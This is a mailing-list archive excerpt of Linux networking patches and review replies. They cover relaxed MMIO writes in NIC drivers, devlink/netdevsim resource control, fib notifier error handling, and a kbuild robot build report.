+u32 val) +{ + writel_relaxed(val, db); + if (bp->flags & BNXT_FLAG_DOUBLE_DB) + writel_relaxed(val, db); +} + /* For TX and RX ring doorbells */ static inline void bnxt_db_write(struct bnxt *bp, void __iomem *db, u32 val) { -- 2.7.4
[PATCH v7 1/7] net: qla3xxx: Eliminate duplicate barriers on weakly-ordered archs
Code includes wmb() followed by writel(). writel() already has a barrier on some architectures like arm64. This ends up CPU observing two barriers back to back before executing the register write. Since code already has an explicit barrier call, changing code to wmb() writel_relaxed() mmiowb() for multi-arch support. Signed-off-by: Sinan Kaya --- drivers/net/ethernet/qlogic/qla3xxx.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/qlogic/qla3xxx.c b/drivers/net/ethernet/qlogic/qla3xxx.c index 9e5264d..b48f761 100644 --- a/drivers/net/ethernet/qlogic/qla3xxx.c +++ b/drivers/net/ethernet/qlogic/qla3xxx.c @@ -1858,8 +1858,9 @@ static void ql_update_small_bufq_prod_index(struct ql3_adapter *qdev) qdev->small_buf_release_cnt -= 8; } wmb(); - writel(qdev->small_buf_q_producer_index, - &port_regs->CommonRegs.rxSmallQProducerIndex); + writel_relaxed(qdev->small_buf_q_producer_index, + &port_regs->CommonRegs.rxSmallQProducerIndex); + mmiowb(); } } -- 2.7.4
[PATCH v7 2/7] qlcnic: Eliminate duplicate barriers on weakly-ordered archs
Code includes wmb() followed by writel(). writel() already has a barrier on some architectures like arm64. This ends up CPU observing two barriers back to back before executing the register write. Since code already has an explicit barrier call, changing writel() to writel_relaxed(). Signed-off-by: Sinan Kaya Acked-by: Manish Chopra --- drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c index 46b0372..97c146e7 100644 --- a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c +++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c @@ -478,7 +478,7 @@ irqreturn_t qlcnic_83xx_clear_legacy_intr(struct qlcnic_adapter *adapter) wmb(); /* clear the interrupt trigger control register */ - writel(0, adapter->isr_int_vec); + writel_relaxed(0, adapter->isr_int_vec); intr_val = readl(adapter->isr_int_vec); do { intr_val = readl(adapter->tgt_status_reg); -- 2.7.4
[PATCH v7 4/7] bnx2x: Eliminate duplicate barriers on weakly-ordered archs
Code includes wmb() followed by writel(). writel() already has a barrier on some architectures like arm64. This ends up CPU observing two barriers back to back before executing the register write. Since code already has an explicit barrier call, changing writel() to writel_relaxed(). Signed-off-by: Sinan Kaya --- drivers/net/ethernet/broadcom/bnx2x/bnx2x.h | 12 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c | 2 +- drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h | 4 ++-- drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c | 2 +- drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c| 4 ++-- drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c| 4 +++- 6 files changed, 17 insertions(+), 11 deletions(-) diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h index 352beff..d847e1b 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h @@ -166,6 +166,12 @@ do { \ #define REG_RD8(bp, offset)readb(REG_ADDR(bp, offset)) #define REG_RD16(bp, offset) readw(REG_ADDR(bp, offset)) +#define REG_WR_RELAXED(bp, offset, val)\ + writel_relaxed((u32)val, REG_ADDR(bp, offset)) + +#define REG_WR16_RELAXED(bp, offset, val) \ + writew_relaxed((u16)val, REG_ADDR(bp, offset)) + #define REG_WR(bp, offset, val)writel((u32)val, REG_ADDR(bp, offset)) #define REG_WR8(bp, offset, val) writeb((u8)val, REG_ADDR(bp, offset)) #define REG_WR16(bp, offset, val) writew((u16)val, REG_ADDR(bp, offset)) @@ -758,10 +764,8 @@ struct bnx2x_fastpath { #if (BNX2X_DB_SHIFT < BNX2X_DB_MIN_SHIFT) #error "Min DB doorbell stride is 8" #endif -#define DOORBELL(bp, cid, val) \ - do { \ - writel((u32)(val), bp->doorbells + (bp->db_size * (cid))); \ - } while (0) +#define DOORBELL_RELAXED(bp, cid, val) \ + writel_relaxed((u32)(val), (bp)->doorbells + ((bp)->db_size * (cid))) /* TX CSUM helpers */ #define SKB_CS_OFF(skb)(offsetof(struct tcphdr, check) - \ diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c index 0f86f18..95871576 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c @@ -4156,7 +4156,7 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev) /* make sure descriptor update is observed by HW */ wmb(); - DOORBELL(bp, txdata->cid, txdata->tx_db.raw); + DOORBELL_RELAXED(bp, txdata->cid, txdata->tx_db.raw); mmiowb(); diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h index a5265e1..a8ce5c5 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h @@ -522,8 +522,8 @@ static inline void bnx2x_update_rx_prod(struct bnx2x *bp, wmb(); for (i = 0; i < sizeof(rx_prods)/4; i++) - REG_WR(bp, fp->ustorm_rx_prods_offset + i*4, - ((u32 *)&rx_prods)[i]); + REG_WR_RELAXED(bp, fp->ustorm_rx_prods_offset + i * 4, + ((u32 *)&rx_prods)[i]); mmiowb(); /* keep prod updates ordered */ diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c index 39af4f8..da18aa2 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c @@ -2593,7 +2593,7 @@ static int bnx2x_run_loopback(struct bnx2x *bp, int loopback_mode) txdata->tx_db.data.prod += 2; /* make sure descriptor update is observed by the HW */ wmb(); - DOORBELL(bp, txdata->cid, txdata->tx_db.raw); + DOORBELL_RELAXED(bp, txdata->cid, txdata->tx_db.raw); mmiowb(); barrier(); diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c index 74fc9af..146c40d 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c @@ -3817,8 +3817,8 @@ static void bnx2x_sp_prod_update(struct bnx2x *bp) */ mb(); - REG_WR16(bp, BAR_XSTRORM_INTMEM + XSTORM_SPQ_PROD_OFFSET(func), -bp->spq_prod_idx); + REG_WR16_RELAXED(bp, BAR_XSTRORM_INTMEM + XSTORM_SPQ_PROD_OFFSET(func), +bp->spq_prod_idx); mmiowb(); } diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c index 76a4668..8e0a317 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c @@ -170,7 +170,9 @@ static int bnx2x_send_msg2pf(struct bnx2x *bp, u8 *done, dma_addr_t msg_mapping)
[PATCH v7 3/7] bnx2x: Replace doorbell barrier() with wmb()
barrier() doesn't guarantee memory writes to be observed by the hardware on all architectures. barrier() only tells compiler not to move this code with respect to other read/writes. If memory write needs to be observed by the HW, wmb() is the right choice. Signed-off-by: Sinan Kaya --- drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c | 3 ++- drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c | 3 ++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c index d7c98e8..0f86f18 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c @@ -4153,7 +4153,8 @@ netdev_tx_t bnx2x_start_xmit(struct sk_buff *skb, struct net_device *dev) wmb(); txdata->tx_db.data.prod += nbd; - barrier(); + /* make sure descriptor update is observed by HW */ + wmb(); DOORBELL(bp, txdata->cid, txdata->tx_db.raw); diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c index 1e33abd..39af4f8 100644 --- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c +++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c @@ -2591,7 +2591,8 @@ static int bnx2x_run_loopback(struct bnx2x *bp, int loopback_mode) wmb(); txdata->tx_db.data.prod += 2; - barrier(); + /* make sure descriptor update is observed by the HW */ + wmb(); DOORBELL(bp, txdata->cid, txdata->tx_db.raw); mmiowb(); -- 2.7.4
[PATCH v7 7/7] net: ena: Eliminate duplicate barriers on weakly-ordered archs
Code includes barrier() followed by writel(). writel() already has a barrier on some architectures like arm64. This ends up CPU observing two barriers back to back before executing the register write. Create a new wrapper function with relaxed write operator. Use the new wrapper when a write is following a barrier(). Since code already has an explicit barrier call, changing writel() to writel_relaxed() and adding mmiowb() for ordering protection. Signed-off-by: Sinan Kaya --- drivers/net/ethernet/amazon/ena/ena_com.c | 8 ++-- drivers/net/ethernet/amazon/ena/ena_eth_com.h | 8 ++-- drivers/net/ethernet/amazon/ena/ena_netdev.c | 5 +++-- 3 files changed, 15 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c index bf2de52..1b9d3130 100644 --- a/drivers/net/ethernet/amazon/ena/ena_com.c +++ b/drivers/net/ethernet/amazon/ena/ena_com.c @@ -631,8 +631,10 @@ static u32 ena_com_reg_bar_read32(struct ena_com_dev *ena_dev, u16 offset) */ wmb(); - writel(mmio_read_reg, ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF); + writel_relaxed(mmio_read_reg, + ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF); + mmiowb(); for (i = 0; i < timeout; i++) { if (read_resp->req_id == mmio_read->seq_num) break; @@ -1826,7 +1828,9 @@ void ena_com_aenq_intr_handler(struct ena_com_dev *dev, void *data) /* write the aenq doorbell after all AENQ descriptors were read */ mb(); - writel((u32)aenq->head, dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF); + writel_relaxed((u32)aenq->head, + dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF); + mmiowb(); } int ena_com_dev_reset(struct ena_com_dev *ena_dev, diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.h b/drivers/net/ethernet/amazon/ena/ena_eth_com.h index 2f76572..6fdc753 100644 --- a/drivers/net/ethernet/amazon/ena/ena_eth_com.h +++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.h @@ -107,7 +107,8 @@ static inline int ena_com_sq_empty_space(struct ena_com_io_sq *io_sq) return io_sq->q_depth - 1 - cnt; } -static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq) +static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq, + bool relaxed) { u16 tail; @@ -116,7 +117,10 @@ static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq) pr_debug("write submission queue doorbell for queue: %d tail: %d\n", io_sq->qid, tail); - writel(tail, io_sq->db_addr); + if (relaxed) + writel_relaxed(tail, io_sq->db_addr); + else + writel(tail, io_sq->db_addr); return 0; } diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c index 6975150..a822e70 100644 --- a/drivers/net/ethernet/amazon/ena/ena_netdev.c +++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c @@ -556,7 +556,8 @@ static int ena_refill_rx_bufs(struct ena_ring *rx_ring, u32 num) * issue a doorbell */ wmb(); - ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq); + ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq, true); + mmiowb(); } rx_ring->next_to_use = next_to_use; @@ -2151,7 +2152,7 @@ static netdev_tx_t ena_start_xmit(struct sk_buff *skb, struct net_device *dev) if (netif_xmit_stopped(txq) || !skb->xmit_more) { /* trigger the dma engine */ - ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq); + ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq, false); u64_stats_update_begin(&tx_ring->syncp); tx_ring->tx_stats.doorbells++; u64_stats_update_end(&tx_ring->syncp); -- 2.7.4
[PATCH v7 0/7] netdev: Eliminate duplicate barriers on weakly-ordered archs
Code includes wmb() followed by writel() in multiple places. writel() already has a barrier on some architectures like arm64. This ends up CPU observing two barriers back to back before executing the register write. Since code already has an explicit barrier call, changing writel() to writel_relaxed(). I did a regex search for wmb() followed by writel() in each drivers directory. I scrubbed the ones I care about in this series. I considered "ease of change", "popular usage" and "performance critical path" as the determining criteria for my filtering. We used relaxed API heavily on ARM for a long time but it did not exist on other architectures. For this reason, relaxed architectures have been paying double penalty in order to use the common drivers. Now that relaxed API is present on all architectures, we can go and scrub all drivers to see what needs to change and what can remain. We start with mostly used ones and hope to increase the coverage over time. It will take a while to cover all drivers. Feel free to apply patches individually. Changes since v6: - bring back amazon ena and add mmiowb, remove ena_com_write_sq_doorbell_rel(). - remove extra mmiowb in bnx2x - correct spelling mistake in bnx2x: Replace doorbell barrier() with wmb() Sinan Kaya (7): net: qla3xxx: Eliminate duplicate barriers on weakly-ordered archs qlcnic: Eliminate duplicate barriers on weakly-ordered archs bnx2x: Replace doorbell barrier() with wmb() bnx2x: Eliminate duplicate barriers on weakly-ordered archs net: qlge: Eliminate duplicate barriers on weakly-ordered archs bnxt_en: Eliminate duplicate barriers on weakly-ordered archs net: ena: Eliminate duplicate barriers on weakly-ordered archs drivers/net/ethernet/amazon/ena/ena_com.c | 8 ++-- drivers/net/ethernet/amazon/ena/ena_eth_com.h | 8 ++-- drivers/net/ethernet/amazon/ena/ena_netdev.c| 5 +++-- drivers/net/ethernet/broadcom/bnx2x/bnx2x.h | 12 drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c | 5 +++-- drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h | 4 ++-- drivers/net/ethernet/broadcom/bnx2x/bnx2x_ethtool.c | 5 +++-- drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c| 4 ++-- drivers/net/ethernet/broadcom/bnx2x/bnx2x_vfpf.c| 4 +++- drivers/net/ethernet/broadcom/bnxt/bnxt.c | 2 +- drivers/net/ethernet/broadcom/bnxt/bnxt.h | 9 + drivers/net/ethernet/qlogic/qla3xxx.c | 5 +++-- drivers/net/ethernet/qlogic/qlcnic/qlcnic_83xx_hw.c | 2 +- drivers/net/ethernet/qlogic/qlge/qlge.h | 16 drivers/net/ethernet/qlogic/qlge/qlge_main.c| 3 ++- 15 files changed, 68 insertions(+), 24 deletions(-) -- 2.7.4
Re: [PATCH net] nfp: use full 40 bits of the NSP buffer address
On Fri, 23 Mar 2018 19:42:22 -0700, Jakub Kicinski wrote: > From: Dirk van der Merwe > > The NSP default buffer is a piece of NFP memory where additional > command data can be placed. Its format has been copied from > host buffer, but the PCIe selection bits do not make sense in > this case. If those get masked out from a NFP address - writes > to random place in the chip memory may be issued and crash the > device. > > This has never been an issue because the buffer used to be > allocated in memory with less-than-38-bit-long address but that > is about to change. > > Signed-off-by: Dirk van der Merwe > Signed-off-by: Jakub Kicinski > --- > drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c | 3 +-- > 1 file changed, 1 insertion(+), 2 deletions(-) > > diff --git a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c > b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c > index 39abac678b71..b54ab02f5b33 100644 > --- a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c > +++ b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c > @@ -71,8 +71,7 @@ > /* CPP address to retrieve the data from */ > #define NSP_BUFFER 0x10 > #define NSP_BUFFER_CPP GENMASK_ULL(63, 40) > -#define NSP_BUFFER_PCIEGENMASK_ULL(39, 38) > -#define NSP_BUFFER_ADDRESS GENMASK_ULL(37, 0) > +#define NSP_BUFFER_ADDRESS GENMASK_ULL(39, 0) self-nack, this is changing a shared define for all bufs, adding a new define of NFP buf will be cleaner.
Re: [PATCH RFC net-next 7/7] netdevsim: Add simple FIB resource controller via devlink
On 3/25/18 12:35 AM, Jakub Kicinski wrote: > On Sat, 24 Mar 2018 09:02:45 -0600, David Ahern wrote: diff --git a/drivers/net/netdevsim/Makefile b/drivers/net/netdevsim/Makefile index 09388c06171d..449b2a1a1800 100644 --- a/drivers/net/netdevsim/Makefile +++ b/drivers/net/netdevsim/Makefile @@ -9,3 +9,7 @@ ifeq ($(CONFIG_BPF_SYSCALL),y) netdevsim-objs += \ bpf.o endif + +ifneq ($(CONFIG_NET_DEVLINK),) >>> >>> Hm. Don't you need MAY_USE_DEVLINK dependency perhaps? >> >> mlxsw uses CONFIG_NET_DEVLINK in its Makefile. >> >> MAY_USE_DEVLINK seems to only be used in Kconfig files. Not clear to me >> why it is needed at all. > > NETDEVSIM=y && DEVLINK=m > ok. I purposely did not add DEVLINK as a dependency to netdevsim to make the resource controller truly optional. Can add it if you prefer.
Re: [PATCH RFC net-next 7/7] netdevsim: Add simple FIB resource controller via devlink
On 3/24/18 10:02 AM, Jiri Pirko wrote: >>> >>> Wait a second. What do you mean by "per-network namespace"? Devlink >>> instance is always associated with one physical device. Like an ASIC. >>> >>> has a net entry, the simplest design is to put it into the namespace of the controller. Without it, controlling resource sizes in namespace 'foobar' has to be done from init_net, which is just wrong. >> >> you need to look at how netdevsim creates a device per netdevice. > > That means one devlink instance for each netdevsim device, doesn't it? > yes. >>> >>> Still not sure how to handle namespaces in devlink. Originally, I >>> thought it would be okay to leave all devlink instances in init_ns. >>> Because what happens if you move netdev to another namespace? Should the >>> devlink move as well? What if you have multiple ports, each in different >>> namespace. Can user move devlink instance to another namespace? Etc. >>> >> >> The devlink instance is associated with a 'struct device' and those do >> not change namespaces AFAIK. > > Yeah. But you put devlink instance into namespace according to struct > net_device. That is mismatch. > New netdevsim netdevice creates a new 'struct device' which creates a new devlink instance. The namespace the netdev is created in is then passed to the devlink instance. Yes, the netdev could change namespaces, but that is something we can easily prevent if it has a devlink instance. But really, we are way down a tangent with respect to the intent of this patch set. I am fine with limiting the example resource controller to just the init_net; this patch set is really aimed at the bigger idea of allowing a notifier handler to fail route and rule adds. We can revisit devlink and namespaces another time, along with moving switch ports to namespaces - a key part of implementing a feature equivalent to what Cisco calls a VDC [1]. [1] https://www.cisco.com/c/en/us/products/collateral/switches/nexus-7000-10-slot-switch/White_Paper_Tech_Overview_Virtual_Device_Contexts.html
Re: [PATCH RFC net-next 1/7] net: Fix fib notifer to return errno
On 3/25/18 2:16 AM, Ido Schimmel wrote: > On Thu, Mar 22, 2018 at 03:57:51PM -0700, David Ahern wrote: >> Notifier handlers use notifier_from_errno to convert any potential error >> to an encoded format. As a consequence the other side, call_fib_notifiers >> in this case, needs to use notifier_to_errno to return the error from >> the handler back to its caller. >> >> Signed-off-by: David Ahern >> --- >> net/core/fib_notifier.c | 5 - >> 1 file changed, 4 insertions(+), 1 deletion(-) >> >> diff --git a/net/core/fib_notifier.c b/net/core/fib_notifier.c >> index 5ace0705a3f9..14ba52ebe8c9 100644 >> --- a/net/core/fib_notifier.c >> +++ b/net/core/fib_notifier.c >> @@ -21,8 +21,11 @@ EXPORT_SYMBOL(call_fib_notifier); >> int call_fib_notifiers(struct net *net, enum fib_event_type event_type, >> struct fib_notifier_info *info) > > There's another (less interesting case) - call_fib_notifier(), which is > used to dump the FIB tables for the caller registering to the > notification chain. > > For example, if you have a non-default FIB rule in the system and you > modprobe mlxsw, you'll get a silent failure and routes will not be > offloaded. On the other hand, I'm not sure we want to fail the module > loading in such cases. right. In normal cases the driver is loaded to create the netdevices long before any networking config is done. So it seems to me the use case you refer to, some user would have go out of there way to create a situation where they install config that is not supported by the driver. > > A possible solution is to have the driver emit a warning via extack for > each route/rule being notified after the abort mechanism was triggered. extack is not available on module load. Per past discussions, something you suggested, we need a message for "out-of-line" cases like this where a driver notifies userspace of a problem.
RE: [PATCH iproute2-next] rdma: Move RDMA UAPI header file to be under RDMA responsibility
> Subject: [PATCH iproute2-next] rdma: Move RDMA UAPI header file to be > under RDMA responsibility > > From: Leon Romanovsky > > In iproute2 package, the updates of UAPIs files are performed > after the needed feature lands in kernel's net-next tree. > > Such development flow created delays to the rdma tool developers, > who uses rdma-next tree as a basis for their work. > > Move RDMA UAPI file to be under rdma/ folder, so whole responsibility > of syncing this file will be on them. > > Signed-off-by: Leon Romanovsky Reviewed-by: Steve Wise
Re: [PATCH v4 17/17] net: ena: Eliminate duplicate barriers on weakly-ordered archs
On 2018-03-25 08:06, Belgazal, Netanel wrote: I think you should either add a parameter to ena_com_write_sq_doorbell() or add ena_com_write_sq_doorbell_rel(). Right now, you have unused function. That is true. I got rid of ena_com_write_sq_doorbell_rel. On 3/20/18, 4:43 AM, "Sinan Kaya" wrote: Code includes barrier() followed by writel(). writel() already has a barrier on some architectures like arm64. This ends up CPU observing two barriers back to back before executing the register write. Create a new wrapper function with relaxed write operator. Use the new wrapper when a write is following a barrier(). Since code already has an explicit barrier call, changing writel() to writel_relaxed(). Signed-off-by: Sinan Kaya --- drivers/net/ethernet/amazon/ena/ena_com.c | 6 -- drivers/net/ethernet/amazon/ena/ena_eth_com.h | 22 -- drivers/net/ethernet/amazon/ena/ena_netdev.c | 4 ++-- 3 files changed, 26 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c index bf2de52..b6e628f 100644 --- a/drivers/net/ethernet/amazon/ena/ena_com.c +++ b/drivers/net/ethernet/amazon/ena/ena_com.c @@ -631,7 +631,8 @@ static u32 ena_com_reg_bar_read32(struct ena_com_dev *ena_dev, u16 offset) */ wmb(); - writel(mmio_read_reg, ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF); + writel_relaxed(mmio_read_reg, + ena_dev->reg_bar + ENA_REGS_MMIO_REG_READ_OFF); for (i = 0; i < timeout; i++) { if (read_resp->req_id == mmio_read->seq_num) @@ -1826,7 +1827,8 @@ void ena_com_aenq_intr_handler(struct ena_com_dev *dev, void *data) /* write the aenq doorbell after all AENQ descriptors were read */ mb(); - writel((u32)aenq->head, dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF); + writel_relaxed((u32)aenq->head, + dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF); } int ena_com_dev_reset(struct ena_com_dev *ena_dev, diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.h b/drivers/net/ethernet/amazon/ena/ena_eth_com.h index 2f76572..09ef7cd 100644 --- a/drivers/net/ethernet/amazon/ena/ena_eth_com.h +++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.h @@ -107,7 +107,8 @@ static inline int ena_com_sq_empty_space(struct ena_com_io_sq *io_sq) return io_sq->q_depth - 1 - cnt; } -static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq) +static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq, + bool relaxed) { u16 tail; @@ -116,7 +117,24 @@ static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq) pr_debug("write submission queue doorbell for queue: %d tail: %d\n", io_sq->qid, tail); - writel(tail, io_sq->db_addr); + if (relaxed) + writel_relaxed(tail, io_sq->db_addr); + else + writel(tail, io_sq->db_addr); + + return 0; +} + +static inline int ena_com_write_sq_doorbell_rel(struct ena_com_io_sq *io_sq) +{ + u16 tail; + + tail = io_sq->tail; + + pr_debug("write submission queue doorbell for queue: %d tail: %d\n", +io_sq->qid, tail); + + writel_relaxed(tail, io_sq->db_addr); return 0; } diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c index 6975150..0530201 100644 --- a/drivers/net/ethernet/amazon/ena/ena_netdev.c +++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c @@ -556,7 +556,7 @@ static int ena_refill_rx_bufs(struct ena_ring *rx_ring, u32 num) * issue a doorbell */ wmb(); - ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq); + ena_com_write_sq_doorbell(rx_ring->ena_com_io_sq, true); } rx_ring->next_to_use = next_to_use; @@ -2151,7 +2151,7 @@ static netdev_tx_t ena_start_xmit(struct sk_buff *skb, struct net_device *dev) if (netif_xmit_stopped(txq) || !skb->xmit_more) { /* trigger the dma engine */ - ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq); + ena_com_write_sq_doorbell(tx_ring->ena_com_io_sq, false); u64_stats_update_begin(&tx_ring->syncp); tx_ring->tx_stats.doorbells++; u64_stats_update_end(&tx_ring->syncp); -- 2.7.4
Re: [PATCH net-next v2 1/2] fs/crashdd: add API to collect hardware dump in second kernel
Hi Rahul, Thank you for the patch! Perhaps something to improve: [auto build test WARNING on net-next/master] url: https://github.com/0day-ci/linux/commits/Rahul-Lakkireddy/fs-crashdd-add-API-to-collect-hardware-dump-in-second-kernel/20180325-191308 config: i386-randconfig-s0-03251817 (attached as .config) compiler: gcc-6 (Debian 6.4.0-9) 6.4.0 20171026 reproduce: # save the attached .config to linux build tree make ARCH=i386 All warnings (new ones prefixed by >>): In file included from fs//crashdd/crashdd.c:8:0: fs//crashdd/crashdd_internal.h:13:23: error: field 'bin_attr' has incomplete type struct bin_attribute bin_attr; /* Binary dump file's attributes */ ^~~~ fs//crashdd/crashdd.c: In function 'crashdd_read': fs//crashdd/crashdd.c:19:43: error: dereferencing pointer to incomplete type 'struct bin_attribute' struct crashdd_dump_node *dump = bin_attr->private; ^~ fs//crashdd/crashdd.c: In function 'crashdd_mkdir': fs//crashdd/crashdd.c:27:9: error: implicit declaration of function 'kobject_create_and_add' [-Werror=implicit-function-declaration] return kobject_create_and_add(name, crashdd_kobj); ^~ fs//crashdd/crashdd.c:27:9: warning: return makes pointer from integer without a cast [-Wint-conversion] return kobject_create_and_add(name, crashdd_kobj); ^~ fs//crashdd/crashdd.c: In function 'crashdd_add_file': fs//crashdd/crashdd.c:39:9: error: implicit declaration of function 'sysfs_create_bin_file' [-Werror=implicit-function-declaration] return sysfs_create_bin_file(kobj, &dump->bin_attr); ^ fs//crashdd/crashdd.c: In function 'crashdd_rmdir': fs//crashdd/crashdd.c:44:2: error: implicit declaration of function 'kobject_put' [-Werror=implicit-function-declaration] kobject_put(kobj); ^~~ In file included from include/linux/kernel.h:10:0, from include/linux/list.h:9, from include/linux/preempt.h:11, from include/linux/spinlock.h:51, from include/linux/vmalloc.h:5, from fs//crashdd/crashdd.c:4: fs//crashdd/crashdd.c: In function 'crashdd_get_driver': fs//crashdd/crashdd.c:101:25: error: dereferencing pointer to incomplete type 'struct kobject' if (!strcmp(node->kobj->name, name)) { ^ include/linux/compiler.h:58:30: note: in definition of macro '__trace_if' if (__builtin_constant_p(!!(cond)) ? !!(cond) : \ ^~~~ >> fs//crashdd/crashdd.c:101:3: note: in expansion of macro 'if' if (!strcmp(node->kobj->name, name)) { ^~ fs//crashdd/crashdd.c: In function 'crashdd_init': fs//crashdd/crashdd.c:227:51: error: 'kernel_kobj' undeclared (first use in this function) crashdd_kobj = kobject_create_and_add("crashdd", kernel_kobj); ^~~ fs//crashdd/crashdd.c:227:51: note: each undeclared identifier is reported only once for each function it appears in fs//crashdd/crashdd.c: In function 'crashdd_add_file': fs//crashdd/crashdd.c:40:1: warning: control reaches end of non-void function [-Wreturn-type] } ^ cc1: some warnings being treated as errors vim +/if +101 fs//crashdd/crashdd.c 3 > 4 #include 5 #include 6 #include 7 8 #include "crashdd_internal.h" 9 10 static LIST_HEAD(crashdd_list); 11 static DEFINE_MUTEX(crashdd_mutex); 12 13 static struct kobject *crashdd_kobj; 14 15 static ssize_t crashdd_read(struct file *filp, struct kobject *kobj, 16 struct bin_attribute *bin_attr, 17 char *buf, loff_t fpos, size_t count) 18 { 19 struct crashdd_dump_node *dump = bin_attr->private; 20 21 memcpy(buf, dump->buf + fpos, count); 22 return count; 23 } 24 25 static struct kobject *crashdd_mkdir(const char *name) 26 { 27 return kobject_create_and_add(name, crashdd_kobj); 28 } 29 30 static int crashdd_add_file(struct kobject *kobj, const char *name, 31 struct crashdd_dump_node *dump) 32 { 33 dump->bin_attr.attr.name = name; 34 dump->bin_attr.attr.mode = 0444; 35 dump->bin_attr.size = dump->size; 36 dump->bin_attr.read = crashdd_read; 37 dump->bin_attr.priva
Re: [PATCH v4 17/17] net: ena: Eliminate duplicate barriers on weakly-ordered archs
